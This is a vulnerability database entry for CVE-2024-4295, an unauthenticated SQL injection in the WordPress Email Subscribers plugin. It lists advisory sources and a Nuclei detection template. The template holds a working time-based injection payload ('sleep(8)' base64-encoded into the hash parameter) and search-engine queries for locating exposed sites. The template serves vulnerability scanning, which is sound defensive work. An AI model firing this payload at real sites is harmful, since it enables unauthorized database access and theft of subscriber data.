| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| The vulnerability of the plugin for Email Subscribers in the WordPress content management system allows a hacker to add additional SQL queries to existing ones and exploit the vulnerable information. | 14 Jun 202400:00 | – | bdu_fstec | |
| CVE-2024-4295 | 5 Jun 202410:32 | – | circl | |
| CVE-2024-4295 | 5 Jun 202405:33 | – | cve | |
| CVE-2024-4295 Email Subscribers by Icegram Express <= 5.7.20 - Unauthenticated SQL Injection via hash | 5 Jun 202405:33 | – | cvelist | |
| CVE-2024-4295 | 5 Jun 202406:15 | – | nvd | |
| CVE-2024-4295 | 5 Jun 202406:15 | – | osv | |
| WordPress Email Subscribers by Icegram Express plugin <= 5.7.20 - Unauthenticated SQL Injection via hash vulnerability | 5 Jun 202403:00 | – | patchstack | |
| WordPress Email Subscribers & Newsletters Plugin <= 5.7.20 is vulnerable to SQL Injection | 5 Jun 202400:00 | – | patchstack | |
| CVE-2024-4295 | 5 Feb 202500:02 | – | redhatcve | |
| VulnCheck KEV: CVE-2024-4295 | 23 Apr 202500:00 | – | vulncheck_kev |
id: CVE-2024-4295
info:
name: Email Subscribers by Icegram Express <= 5.7.20 - Unauthenticated SQL Injection via Hash
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
Email Subscribers by Icegram Express <= 5.7.20 contains an unauthenticated SQL injection vulnerability via the hash parameter.
remediation: Fixed in 5.7.21
impact: This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/id/641123af-1ec6-4549-a58c-0a08b4678f45?source=cve
- https://github.com/cve-2024/CVE-2024-4295-Poc
- https://github.com/truonghuuphuc/CVE-2024-4295-Poc
- https://nvd.nist.gov/vuln/detail/CVE-2024-4295
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-4295
cwe-id: CWE-89
epss-score: 0.10161
epss-percentile: 0.95086
cpe: cpe:2.3:a:icegram:email_subscribers_\&_newsletters:*:*:*:*:*:wordpress:*:*
metadata:
vendor: icegram
product: email_subscribers_\&_newsletters
framework: wordpress
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/email-subscribers/"
fofa-query: body="/wp-content/plugins/email-subscribers/"
tags: time-based-sqli,cve,cve2024,wordpress,wp-plugin,wp,email-subscribers,sqli,vkev,vuln
flow: http(1) && http(2)
variables:
contact_id: "{{contact_id}}"
email: "{{email}}"
rawhash: '{"message_id":0,"campaign_id":0,"contact_id":"{{contact_id}}","email":"{{email}}","guid":"dibwol-qaiebd-qvrgkp-lhyopm-rmyfzo","list_ids":["sleep(8)"],"action":"subscribe"}'
http:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/wp-content/plugins/email-subscribers/readme.txt"
stop-at-first-match: true
host-redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'contains_any(body, "email-subscribers-", "Email Subscribers by Icegram Express")'
internal: true
- raw:
- |
@timeout: 20s
GET /?es=optin&hash={{ base64(rawhash) }} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=8'
- 'contains(body, "You have been successfully subscribed")'
condition: and
# digest: 4b0a00483046022100f2c777fa09203bbb2dcf095c022270218cfe4616d4c6f50c1874258c5f554e18022100e944af55cff9405b910d9bf8cbd991a8cc9a4676e720555f1accc4d68a92e68c:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation